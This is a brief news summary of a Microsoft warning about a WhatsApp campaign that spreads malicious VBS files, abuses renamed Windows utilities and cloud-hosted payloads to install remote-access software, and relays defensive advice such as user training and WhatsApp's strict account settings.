Microsoft has issued a warning regarding a sophisticated social engineering campaign on WhatsApp that uses malicious scripts and legitimate Windows tools to gain unauthorized remote access to computers.

Key Points

• Attackers distribute malicious Visual Basic Script files via WhatsApp, often appearing to originate from a victim's existing contacts.
• The malware utilizes "living off the land" techniques by renaming legitimate Windows utilities like curl.exe and bitsadmin.exe to evade detection.
• Secondary payloads are downloaded from trusted cloud services, including AWS, Tencent Cloud, and Backblaze B2, to blend in with normal network traffic.
• Final malicious Microsoft Installer (MSI) packages, such as AnyDesk.msi, grant attackers full remote control to steal data or deploy ransomware.
• Microsoft recommends that users and organizations prioritize employee training to recognize suspicious attachments and unexpected messages on messaging platforms.
• WhatsApp users can enable "Strict Account Settings" in the app's privacy menu to automatically block attachments and calls from unknown users.

Why it Matters

This campaign highlights the growing risk of attackers exploiting trusted communication platforms to bypass traditional security measures by using legitimate software for malicious purposes. Businesses and individuals must remain vigilant, as these attacks can lead to total system compromise, data theft, and the deployment of further ransomware threats.